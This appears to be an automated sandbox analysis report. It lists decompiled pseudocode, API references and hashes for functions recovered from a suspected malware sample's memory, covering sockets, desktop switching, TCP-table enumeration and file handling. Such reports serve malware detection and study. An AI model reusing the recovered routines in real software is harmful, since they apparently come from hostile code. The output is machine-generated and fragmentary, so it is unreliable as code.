                                                                                              				_push(__ecx);
                                                                                              				_t24 = _a4;
                                                                                              				_t17 = __ecx;
                                                                                              				_v8 = __ecx;
                                                                                              				if( *((intOrPtr*)(_t24 + 0x48)) != 0) {
                                                                                              					_t30 = _a8;
                                                                                              					if(_a8 == 0 || _a12 <= 0) {
                                                                                              						_t31 = 0x57;
                                                                                              						goto L10;
                                                                                              					} else {
                                                                                              						_t34 = _t24 + 0x6c;
                                                                                              						EnterCriticalSection(_t34);
                                                                                              						if( *((intOrPtr*)(_t24 + 0x30)) == 0) {
                                                                                              							_t31 = 0x10d8;
                                                                                              						} else {
                                                                                              							_t31 = E04274450(_v8, _t24, _t30, _a12);
                                                                                              						}
                                                                                              						LeaveCriticalSection(_t34);
                                                                                              						if(_t31 != 0) {
                                                                                              							_t17 = _v8;
                                                                                              							L10:
                                                                                              							if( *((intOrPtr*)(_t17 + 8)) == 2 &&  *((intOrPtr*)(_t24 + 0x30)) != 0) {
                                                                                              								PostQueuedCompletionStatus( *(_t17 + 0x50), _t31,  *(_t24 + 4), 0);
                                                                                              							}
                                                                                              							SetLastError(_t31);
                                                                                              						}
                                                                                              					}
                                                                                              					return 0 | _t31 == 0x00000000;
                                                                                              				} else {
                                                                                              					SetLastError(0x139f);
                                                                                              					return 0;
                                                                                              				}
                                                                                              			}








                                                                                              0x042743a3
                                                                                              0x042743a5
                                                                                              0x042743a8
                                                                                              0x042743aa
                                                                                              0x042743b1
                                                                                              0x042743c8
                                                                                              0x042743cd
                                                                                              0x0427440d
                                                                                              0x00000000
                                                                                              0x042743d5
                                                                                              0x042743d6
                                                                                              0x042743da
                                                                                              0x042743e4
                                                                                              0x042743f7
                                                                                              0x042743e6
                                                                                              0x042743f3
                                                                                              0x042743f3
                                                                                              0x042743fd
                                                                                              0x04274406
                                                                                              0x04274408
                                                                                              0x04274412
                                                                                              0x04274416
                                                                                              0x04274427
                                                                                              0x04274427
                                                                                              0x0427442e
                                                                                              0x0427442e
                                                                                              0x04274406
                                                                                              0x04274440
                                                                                              0x042743b3
                                                                                              0x042743b8
                                                                                              0x042743c4
                                                                                              0x042743c4

                                                                                              APIs
                                                                                              • SetLastError.KERNEL32(0000139F,?,?,?,04274382,00000000,?,?), ref: 042743B8
                                                                                              • RtlEnterCriticalSection.NTDLL(?), ref: 042743DA
                                                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 042743FD
                                                                                              • PostQueuedCompletionStatus.KERNEL32(?,00000057,?,00000000,?,?,?,?,04274382,00000000,?,?), ref: 04274427
                                                                                              • SetLastError.KERNEL32(00000057,?,?,?,?,04274382,00000000,?,?), ref: 0427442E
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CriticalErrorLastSection$CompletionEnterLeavePostQueuedStatus
                                                                                              • String ID:
                                                                                              • API String ID: 4119631813-0
                                                                                              • Opcode ID: a00909ef4f65b998709891b66b6d5689fc99139481fd1e4eaab3bd8c9769ede1
                                                                                              • Instruction ID: 96122e75cd9df5513408fc4992859e1bcffa7e53b0ec63d36e4df2c153c52ca7
                                                                                              • Opcode Fuzzy Hash: a00909ef4f65b998709891b66b6d5689fc99139481fd1e4eaab3bd8c9769ede1
                                                                                              • Instruction Fuzzy Hash: D111D032364205EBCB20AF58E848B9AB7A8FF84719F208159FC0997140CB35E951DA60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 22%
                                                                                              			E0426F850(intOrPtr* __ecx) {
                                                                                              				void* __ebx;
                                                                                              				void* __edi;
                                                                                              				intOrPtr _t24;
                                                                                              				intOrPtr _t25;
                                                                                              				long _t31;
                                                                                              				intOrPtr* _t39;
                                                                                              
                                                                                              				_t39 = __ecx;
                                                                                              				_t31 = GetCurrentThreadId();
                                                                                              				if( *((intOrPtr*)(_t39 + 0x50)) == 3) {
                                                                                              					L10:
                                                                                              					 *((intOrPtr*)(_t39 + 0x48)) = 1;
                                                                                              					SetLastError(0x139f);
                                                                                              					return 0;
                                                                                              				} else {
                                                                                              					E0426EC90(_t39 + 0x148);
                                                                                              					if( *((intOrPtr*)( *_t39 + 0x24))() == 0) {
                                                                                              						 *((intOrPtr*)(_t39 + 0x148)) = 0;
                                                                                              						goto L10;
                                                                                              					} else {
                                                                                              						 *((intOrPtr*)(_t39 + 0x50)) = 2;
                                                                                              						_push(_t31);
                                                                                              						 *((intOrPtr*)(_t39 + 0x148)) = 0;
                                                                                              						E0426E8C0(_t31, _t39, _t39);
                                                                                              						 *((intOrPtr*)(_t39 + 0x4c)) = 0;
                                                                                              						if( *((intOrPtr*)(_t39 + 0xc)) != 0) {
                                                                                              							 *((intOrPtr*)( *_t39 + 0x90))( *((intOrPtr*)(_t39 + 0x10)),  *((intOrPtr*)(_t39 + 0x14)));
                                                                                              						}
                                                                                              						_t24 =  *((intOrPtr*)(_t39 + 0x20));
                                                                                              						if(_t24 != 0) {
                                                                                              							__imp__WSACloseEvent(_t24);
                                                                                              							 *((intOrPtr*)(_t39 + 0x20)) = 0;
                                                                                              						}
                                                                                              						_t25 =  *((intOrPtr*)(_t39 + 0x1c));
                                                                                              						if(_t25 != 0xffffffff) {
                                                                                              							__imp__#22(_t25, 1);
                                                                                              							__imp__#3( *((intOrPtr*)(_t39 + 0x1c)));
                                                                                              							 *((intOrPtr*)(_t39 + 0x1c)) = 0xffffffff;
                                                                                              						}
                                                                                              						 *((intOrPtr*)( *_t39 + 0xb8))();
                                                                                              						return 1;
                                                                                              					}
                                                                                              				}
                                                                                              			}









                                                                                              0x0426f853
                                                                                              0x0426f85f
                                                                                              0x0426f861
                                                                                              0x0426f906
                                                                                              0x0426f90b
                                                                                              0x0426f912
                                                                                              0x0426f91d
                                                                                              0x0426f867
                                                                                              0x0426f86d
                                                                                              0x0426f87b
                                                                                              0x0426f8fc
                                                                                              0x00000000
                                                                                              0x0426f87d
                                                                                              0x0426f87d
                                                                                              0x0426f886
                                                                                              0x0426f887
                                                                                              0x0426f891
                                                                                              0x0426f89a
                                                                                              0x0426f8a1
                                                                                              0x0426f8ad
                                                                                              0x0426f8ad
                                                                                              0x0426f8b3
                                                                                              0x0426f8b8
                                                                                              0x0426f8bb
                                                                                              0x0426f8c1
                                                                                              0x0426f8c1
                                                                                              0x0426f8c8
                                                                                              0x0426f8ce
                                                                                              0x0426f8d3
                                                                                              0x0426f8dc
                                                                                              0x0426f8e2
                                                                                              0x0426f8e2
                                                                                              0x0426f8ed
                                                                                              0x0426f8fb
                                                                                              0x0426f8fb
                                                                                              0x0426f87b

                                                                                              APIs
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 0426F855
                                                                                              • SetLastError.KERNEL32(0000139F,?,00000000,04258135,74D0F5E0,00000000,80004005,80004005,80004005,80004005,80004005,?,04258B27,0429E048,?), ref: 0426F912
                                                                                                • Part of subcall function 0426EC90: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 0426ECA5
                                                                                                • Part of subcall function 0426EC90: SwitchToThread.KERNEL32(?,?,00000000,0426E712,?,00000000,04258425,74D0F5E0,00000004,80004005,80004005,80004005,80004005,80004005,?,042587F8), ref: 0426ECBD
                                                                                                • Part of subcall function 0426E8C0: SetEvent.KERNEL32(?,?,04258B6E,0429E024,?), ref: 0426E8E7
                                                                                                • Part of subcall function 0426E8C0: CloseHandle.KERNEL32(00000000,?,04258B6E,0429E024,?), ref: 0426E90A
                                                                                              • WSACloseEvent.WS2_32(00000000), ref: 0426F8BB
                                                                                              • shutdown.WS2_32(?,00000001), ref: 0426F8D3
                                                                                              • closesocket.WS2_32(?), ref: 0426F8DC
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseEventThread$CompareCurrentErrorExchangeHandleInterlockedLastSwitchclosesocketshutdown
                                                                                              • String ID:
                                                                                              • API String ID: 880953794-0
                                                                                              • Opcode ID: 3a60f291a944608b88c8731d998ebb60a0c58d029c8fc58bce96c7ef4b7e4174
                                                                                              • Instruction ID: f474a465dc96719a663072bdba693e698d3d6579ff9ffd10be5d1295b0ccfe7f
                                                                                              • Opcode Fuzzy Hash: 3a60f291a944608b88c8731d998ebb60a0c58d029c8fc58bce96c7ef4b7e4174
                                                                                              • Instruction Fuzzy Hash: 0C214C74310602AFDB24AF69E44CB99BBA6FF44315F154228E01AC76D0CB75F8A5CF90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 82%
                                                                                              			E042889B4(void* __ecx) {
                                                                                              				void* __esi;
                                                                                              				intOrPtr _t2;
                                                                                              				void* _t4;
                                                                                              				void* _t10;
                                                                                              				void* _t11;
                                                                                              				void* _t13;
                                                                                              				void* _t15;
                                                                                              				long _t16;
                                                                                              
                                                                                              				_t11 = __ecx;
                                                                                              				_t16 = GetLastError();
                                                                                              				_t10 = 0;
                                                                                              				_t2 =  *0x42a403c; // 0x8
                                                                                              				_t19 = _t2 - 0xffffffff;
                                                                                              				if(_t2 == 0xffffffff) {
                                                                                              					L2:
                                                                                              					_t15 = E04288535(_t11, 1, 0x364);
                                                                                              					_pop(_t13);
                                                                                              					if(_t15 != 0) {
                                                                                              						_t4 = E04289171(_t13, _t16, __eflags,  *0x42a403c, _t15);
                                                                                              						__eflags = _t4;
                                                                                              						if(_t4 != 0) {
                                                                                              							E04288776(_t13, _t15, 0x42a742c);
                                                                                              							E042884AD(_t10);
                                                                                              							__eflags = _t15;
                                                                                              							if(_t15 != 0) {
                                                                                              								goto L9;
                                                                                              							} else {
                                                                                              								goto L8;
                                                                                              							}
                                                                                              						} else {
                                                                                              							_push(_t15);
                                                                                              							goto L4;
                                                                                              						}
                                                                                              					} else {
                                                                                              						_push(_t10);
                                                                                              						L4:
                                                                                              						E042884AD();
                                                                                              						L8:
                                                                                              						SetLastError(_t16);
                                                                                              					}
                                                                                              				} else {
                                                                                              					_t15 = E0428911B(_t11, _t16, _t19, _t2);
                                                                                              					if(_t15 != 0) {
                                                                                              						L9:
                                                                                              						SetLastError(_t16);
                                                                                              						_t10 = _t15;
                                                                                              					} else {
                                                                                              						goto L2;
                                                                                              					}
                                                                                              				}
                                                                                              				return _t10;
                                                                                              			}











                                                                                              0x042889b4
                                                                                              0x042889bf
                                                                                              0x042889c1
                                                                                              0x042889c3
                                                                                              0x042889c8
                                                                                              0x042889cb
                                                                                              0x042889d9
                                                                                              0x042889e5
                                                                                              0x042889e8
                                                                                              0x042889eb
                                                                                              0x042889fd
                                                                                              0x04288a02
                                                                                              0x04288a04
                                                                                              0x04288a0f
                                                                                              0x04288a15
                                                                                              0x04288a1d
                                                                                              0x04288a1f
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x04288a06
                                                                                              0x04288a06
                                                                                              0x00000000
                                                                                              0x04288a06
                                                                                              0x042889ed
                                                                                              0x042889ed
                                                                                              0x042889ee
                                                                                              0x042889ee
                                                                                              0x04288a21
                                                                                              0x04288a22
                                                                                              0x04288a22
                                                                                              0x042889cd
                                                                                              0x042889d3
                                                                                              0x042889d7
                                                                                              0x04288a2a
                                                                                              0x04288a2b
                                                                                              0x04288a31
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x042889d7
                                                                                              0x04288a38

                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(00000001,D33DB39D,-00000004,04281777,042884D3,D33DB39D,?,042812C5,00000001,00000001), ref: 042889B9
                                                                                              • _free.LIBCMT ref: 042889EE
                                                                                              • _free.LIBCMT ref: 04288A15
                                                                                              • SetLastError.KERNEL32(00000000,00000001), ref: 04288A22
                                                                                              • SetLastError.KERNEL32(00000000,00000001), ref: 04288A2B
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$_free
                                                                                              • String ID:
                                                                                              • API String ID: 3170660625-0
                                                                                              • Opcode ID: 86b8bd2d4ab040971bceb92eb99f42b29bd747d7e464722e30779deee4416845
                                                                                              • Instruction ID: 8c5544892ae5522e2a4b1be352ed6bf55144e3ca5d95ff7755042fc8be4e806c
                                                                                              • Opcode Fuzzy Hash: 86b8bd2d4ab040971bceb92eb99f42b29bd747d7e464722e30779deee4416845
                                                                                              • Instruction Fuzzy Hash: 5B01D63B33A601A793267A787C8892F166DDFC52B93A5401DF806E22C1FF75FC125165
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E042718D0(signed int __ecx, signed int* _a4) {
                                                                                              				signed int _t18;
                                                                                              				signed int _t20;
                                                                                              				signed int _t23;
                                                                                              				signed int _t26;
                                                                                              				struct _CRITICAL_SECTION* _t30;
                                                                                              
                                                                                              				_t18 = __ecx;
                                                                                              				if( *((intOrPtr*)(__ecx + 0x1f4)) != 0) {
                                                                                              					_t30 = __ecx + 0x1f8;
                                                                                              					EnterCriticalSection(_t30);
                                                                                              					if( *((intOrPtr*)(_t18 + 0x1f4)) != 0) {
                                                                                              						_t20 =  *((intOrPtr*)( *((intOrPtr*)(_t18 + 0x210)) + 0x68)) +  *((intOrPtr*)( *((intOrPtr*)(_t18 + 0x210)) + 0x60));
                                                                                              						LeaveCriticalSection(_t30);
                                                                                              						 *_a4 = _t20;
                                                                                              						return  !_t20 >> 0x1f;
                                                                                              					} else {
                                                                                              						SetLastError(0x139f);
                                                                                              						LeaveCriticalSection(_t30);
                                                                                              						_t23 = _t18 | 0xffffffff;
                                                                                              						 *_a4 = _t23;
                                                                                              						return  !_t23 >> 0x1f;
                                                                                              					}
                                                                                              				} else {
                                                                                              					SetLastError(0x139f);
                                                                                              					_t26 = _t18 | 0xffffffff;
                                                                                              					 *_a4 = _t26;
                                                                                              					return  !_t26 >> 0x1f;
                                                                                              				}
                                                                                              			}








                                                                                              0x042718d4
                                                                                              0x042718dd
                                                                                              0x042718ff
                                                                                              0x04271906
                                                                                              0x04271913
                                                                                              0x04271946
                                                                                              0x04271949
                                                                                              0x04271953
                                                                                              0x0427195e
                                                                                              0x04271915
                                                                                              0x0427191a
                                                                                              0x04271921
                                                                                              0x0427192a
                                                                                              0x0427192e
                                                                                              0x04271939
                                                                                              0x04271939
                                                                                              0x042718df
                                                                                              0x042718e4
                                                                                              0x042718ed
                                                                                              0x042718f0
                                                                                              0x042718fb
                                                                                              0x042718fb

                                                                                              APIs
                                                                                              • SetLastError.KERNEL32(0000139F), ref: 042718E4
                                                                                              • RtlEnterCriticalSection.NTDLL(?), ref: 04271906
                                                                                              • SetLastError.KERNEL32(0000139F), ref: 0427191A
                                                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 04271921
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CriticalErrorLastSection$EnterLeave
                                                                                              • String ID:
                                                                                              • API String ID: 2124651672-0
                                                                                              • Opcode ID: 99d7c82268e8a219e54461d9272042e324312acf1ba6b64ccd7038ad03af3c16
                                                                                              • Instruction ID: ae018da6d1f1357fbe1fc7e914f8c4c0370075a6b283fff11ff93051c8071a98
                                                                                              • Opcode Fuzzy Hash: 99d7c82268e8a219e54461d9272042e324312acf1ba6b64ccd7038ad03af3c16
                                                                                              • Instruction Fuzzy Hash: 8001843A351505EBC304AF6DE8089A5B76EEFC1335F114226E6218B3C1CB706962C7A4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 79%
                                                                                              			E04265660(struct HDESK__* __ecx, void* __edi, void* __esi) {
                                                                                              				signed int _v8;
                                                                                              				void _v264;
                                                                                              				long _v268;
                                                                                              				signed int _t6;
                                                                                              				struct HDESK__* _t25;
                                                                                              				struct HDESK__* _t27;
                                                                                              				signed int _t28;
                                                                                              
                                                                                              				_t6 =  *0x42a4008; // 0xd33db39d
                                                                                              				_v8 = _t6 ^ _t28;
                                                                                              				_t27 = __ecx;
                                                                                              				_t25 = GetThreadDesktop(GetCurrentThreadId());
                                                                                              				if(GetUserObjectInformationW(_t27, 2,  &_v264, 0x100,  &_v268) != 0) {
                                                                                              					if(SetThreadDesktop(_t27) == 0) {
                                                                                              						goto L1;
                                                                                              					} else {
                                                                                              						CloseDesktop(_t25);
                                                                                              						return E04275AFE(_v8 ^ _t28);
                                                                                              					}
                                                                                              				} else {
                                                                                              					L1:
                                                                                              					return E04275AFE(_v8 ^ _t28);
                                                                                              				}
                                                                                              			}










                                                                                              0x04265669
                                                                                              0x04265670
                                                                                              0x04265675
                                                                                              0x04265684
                                                                                              0x042656a4
                                                                                              0x042656c1
                                                                                              0x00000000
                                                                                              0x042656c3
                                                                                              0x042656c4
                                                                                              0x042656de
                                                                                              0x042656de
                                                                                              0x042656a7
                                                                                              0x042656a7
                                                                                              0x042656b7
                                                                                              0x042656b7

                                                                                              APIs
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 04265677
                                                                                              • GetThreadDesktop.USER32(00000000,?,00000000), ref: 0426567E
                                                                                              • GetUserObjectInformationW.USER32(00000000,00000002,?,00000100,?,?,00000000), ref: 0426569C
                                                                                              • SetThreadDesktop.USER32(00000000,?,00000000), ref: 042656B9
                                                                                              • CloseDesktop.USER32(00000000,?,00000000), ref: 042656C4
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: DesktopThread$CloseCurrentInformationObjectUser
                                                                                              • String ID:
                                                                                              • API String ID: 2068333509-0
                                                                                              • Opcode ID: 575dc5d235237b342dc16f726d3720b91db6eab88110e78a91f47234439b7281
                                                                                              • Instruction ID: fc44d27fb7b6e59f8fd6057f4a93d9d9ba7abfd6b0b6cccd19409dec76b6bb77
                                                                                              • Opcode Fuzzy Hash: 575dc5d235237b342dc16f726d3720b91db6eab88110e78a91f47234439b7281
                                                                                              • Instruction Fuzzy Hash: CC01D6327151086FD720AF6CFC48AFE77ACEB45711F4000AAFC0AC3240DEB8AD818690
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 77%
                                                                                              			E0425B4C0(signed char* _a4) {
                                                                                              				void* _t11;
                                                                                              				signed int _t13;
                                                                                              				signed int _t14;
                                                                                              				long _t16;
                                                                                              				long _t17;
                                                                                              				void* _t22;
                                                                                              				long _t23;
                                                                                              
                                                                                              				_t11 = ( *_a4 & 0x000000ff) - 0x23;
                                                                                              				if(_t11 == 0) {
                                                                                              					return SetEvent( *(_t22 + 8));
                                                                                              				}
                                                                                              				_t13 = _t11 - 2;
                                                                                              				if(_t13 == 0) {
                                                                                              					_t23 =  *0x42a7adc; // 0x0
                                                                                              					_t14 = _t13 & 0xffffff00 |  *(_t23 + 0x20c) == 0x00000000;
                                                                                              					 *(_t23 + 0x20c) = _t14;
                                                                                              					_t7 = _t23 + 0x20e; // 0x20e
                                                                                              					if(_t14 != 0) {
                                                                                              						_t16 = GetFileAttributesW();
                                                                                              						if(_t16 != 0xffffffff) {
                                                                                              							goto L11;
                                                                                              						} else {
                                                                                              							_t17 =  *0x42a7adc; // 0x0
                                                                                              							goto L9;
                                                                                              						}
                                                                                              					} else {
                                                                                              						return DeleteFileW();
                                                                                              					}
                                                                                              				} else {
                                                                                              					_t16 = _t13 - 1;
                                                                                              					if(_t16 != 0) {
                                                                                              						L11:
                                                                                              						return _t16;
                                                                                              					} else {
                                                                                              						_t16 =  *0x42a7adc; // 0x0
                                                                                              						if( *((char*)(_t16 + 0x20c)) == 0) {
                                                                                              							goto L11;
                                                                                              						} else {
                                                                                              							L9:
                                                                                              							return CloseHandle(CreateFileW(_t17 + 0x20e, 0x40000000, 2, 0, 2, 0x80, 0));
                                                                                              						}
                                                                                              					}
                                                                                              				}
                                                                                              			}










                                                                                              0x0425b4c9
                                                                                              0x0425b4cc
                                                                                              0x00000000
                                                                                              0x0425b54f
                                                                                              0x0425b4ce
                                                                                              0x0425b4d1
                                                                                              0x0425b4e8
                                                                                              0x0425b4f5
                                                                                              0x0425b4f8
                                                                                              0x0425b500
                                                                                              0x0425b507
                                                                                              0x0425b513
                                                                                              0x0425b51c
                                                                                              0x00000000
                                                                                              0x0425b51e
                                                                                              0x0425b51e
                                                                                              0x00000000
                                                                                              0x0425b51e
                                                                                              0x0425b509
                                                                                              0x0425b510
                                                                                              0x0425b510
                                                                                              0x0425b4d3
                                                                                              0x0425b4d3
                                                                                              0x0425b4d6
                                                                                              0x0425b556
                                                                                              0x0425b556
                                                                                              0x0425b4d8
                                                                                              0x0425b4d8
                                                                                              0x0425b4e4
                                                                                              0x00000000
                                                                                              0x0425b4e6
                                                                                              0x0425b523
                                                                                              0x0425b549
                                                                                              0x0425b549
                                                                                              0x0425b4e4
                                                                                              0x0425b4d6

                                                                                              APIs
                                                                                              • DeleteFileW.KERNEL32(0000020E), ref: 0425B509
                                                                                              • CreateFileW.KERNEL32(-0000020E,40000000,00000002,00000000,00000002,00000080,00000000), ref: 0425B53B
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0425B542
                                                                                              • SetEvent.KERNEL32(?), ref: 0425B54F
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: File$CloseCreateDeleteEventHandle
                                                                                              • String ID:
                                                                                              • API String ID: 1798639166-0
                                                                                              • Opcode ID: 53b7805060bd1742b4b3e0b70234d5d88dbc2ba512d55c74cc89b52ed335ed89
                                                                                              • Instruction ID: fce1636fb4b3dc411bb6177f9c9ba8091d498eb950005768127bd61e96b53103
                                                                                              • Opcode Fuzzy Hash: 53b7805060bd1742b4b3e0b70234d5d88dbc2ba512d55c74cc89b52ed335ed89
                                                                                              • Instruction Fuzzy Hash: F701DA72704385AFDB249B7CB80CFA57F64EB04355F688255FA148A0E3CA29FC52CB14
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 38%
                                                                                              			E0425DC50(intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                              				void* _v8;
                                                                                              				intOrPtr _v12;
                                                                                              				void* _t8;
                                                                                              				int _t13;
                                                                                              				void* _t17;
                                                                                              				void* _t21;
                                                                                              				void* _t27;
                                                                                              
                                                                                              				_v12 = __ecx;
                                                                                              				_t8 = E0425D570(__edi, __esi);
                                                                                              				_v8 = _t8;
                                                                                              				if(_t8 != 0) {
                                                                                              					_push(__esi);
                                                                                              					_t3 = LocalSize(_t8) + 1; // 0x1
                                                                                              					_t17 = LocalAlloc(0x40, _t3);
                                                                                              					_t27 = _v8;
                                                                                              					_t5 = _t17 + 1; // 0x1
                                                                                              					_t21 = _t5;
                                                                                              					 *_t17 = 0x8e;
                                                                                              					E0427E060(_t21, _t27, _t9);
                                                                                              					LocalFree(_t27);
                                                                                              					_t13 = LocalSize(_t17);
                                                                                              					_push(_t21);
                                                                                              					_push(0x3f);
                                                                                              					_push(_t13);
                                                                                              					_push(_t17);
                                                                                              					E04251C60( *((intOrPtr*)(_v12 + 4)));
                                                                                              					return LocalFree(_t17);
                                                                                              				}
                                                                                              				return _t8;
                                                                                              			}










                                                                                              0x0425dc56
                                                                                              0x0425dc59
                                                                                              0x0425dc5e
                                                                                              0x0425dc63
                                                                                              0x0425dc66
                                                                                              0x0425dc70
                                                                                              0x0425dc7c
                                                                                              0x0425dc7f
                                                                                              0x0425dc83
                                                                                              0x0425dc83
                                                                                              0x0425dc86
                                                                                              0x0425dc8a
                                                                                              0x0425dc99
                                                                                              0x0425dc9c
                                                                                              0x0425dca2
                                                                                              0x0425dca6
                                                                                              0x0425dca8
                                                                                              0x0425dca9
                                                                                              0x0425dcad
                                                                                              0x00000000
                                                                                              0x0425dcb6
                                                                                              0x0425dcba

                                                                                              APIs
                                                                                                • Part of subcall function 0425D570: LoadLibraryA.KERNEL32(iphlpapi.dll,00000000), ref: 0425D59F
                                                                                                • Part of subcall function 0425D570: GetProcAddress.KERNEL32(00000000,GetExtendedTcpTable), ref: 0425D5C1
                                                                                              • LocalSize.KERNEL32(00000000), ref: 0425DC68
                                                                                              • LocalAlloc.KERNEL32(00000040,00000001), ref: 0425DC76
                                                                                              • LocalFree.KERNEL32(?), ref: 0425DC99
                                                                                              • LocalSize.KERNEL32(00000000), ref: 0425DC9C
                                                                                              • LocalFree.KERNEL32(00000000,00000000,00000000,0000003F), ref: 0425DCB3
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Local$FreeSize$AddressAllocLibraryLoadProc
                                                                                              • String ID:
                                                                                              • API String ID: 3285080383-0
                                                                                              • Opcode ID: 807b2a2eb272aaa48e575f24fba90af99358baad0051319bd86085145905f8cb
                                                                                              • Instruction ID: dd15791989a10a231984915fadf1f257c2254516bea7000cbfda2ec35d71c768
                                                                                              • Opcode Fuzzy Hash: 807b2a2eb272aaa48e575f24fba90af99358baad0051319bd86085145905f8cb
                                                                                              • Instruction Fuzzy Hash: 07F0F9B1E14218BBD714BBB8AC48D6BBBBCDF09251B104299FD05A3241DE35AD00C7B1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 38%
                                                                                              			E0425DCC0(intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                              				void* _v8;
                                                                                              				intOrPtr _v12;
                                                                                              				void* _t8;
                                                                                              				int _t13;
                                                                                              				void* _t17;
                                                                                              				void* _t21;
                                                                                              				void* _t27;
                                                                                              
                                                                                              				_v12 = __ecx;
                                                                                              				_t8 = E0425D980(__edi, __esi);
                                                                                              				_v8 = _t8;
                                                                                              				if(_t8 != 0) {
                                                                                              					_push(__esi);
                                                                                              					_t3 = LocalSize(_t8) + 1; // 0x1
                                                                                              					_t17 = LocalAlloc(0x40, _t3);
                                                                                              					_t27 = _v8;
                                                                                              					_t5 = _t17 + 1; // 0x1
                                                                                              					_t21 = _t5;
                                                                                              					 *_t17 = 0x8e;
                                                                                              					E0427E060(_t21, _t27, _t9);
                                                                                              					LocalFree(_t27);
                                                                                              					_t13 = LocalSize(_t17);
                                                                                              					_push(_t21);
                                                                                              					_push(0x3f);
                                                                                              					_push(_t13);
                                                                                              					_push(_t17);
                                                                                              					E04251C60( *((intOrPtr*)(_v12 + 4)));
                                                                                              					return LocalFree(_t17);
                                                                                              				}
                                                                                              				return _t8;
                                                                                              			}










                                                                                              0x0425dcc6
                                                                                              0x0425dcc9
                                                                                              0x0425dcce
                                                                                              0x0425dcd3
                                                                                              0x0425dcd6
                                                                                              0x0425dce0
                                                                                              0x0425dcec
                                                                                              0x0425dcef
                                                                                              0x0425dcf3
                                                                                              0x0425dcf3
                                                                                              0x0425dcf6
                                                                                              0x0425dcfa
                                                                                              0x0425dd09
                                                                                              0x0425dd0c
                                                                                              0x0425dd12
                                                                                              0x0425dd16
                                                                                              0x0425dd18
                                                                                              0x0425dd19
                                                                                              0x0425dd1d
                                                                                              0x00000000
                                                                                              0x0425dd26
                                                                                              0x0425dd2a

                                                                                              APIs
                                                                                                • Part of subcall function 0425D980: LoadLibraryA.KERNEL32(iphlpapi.dll,00000000), ref: 0425D9BB
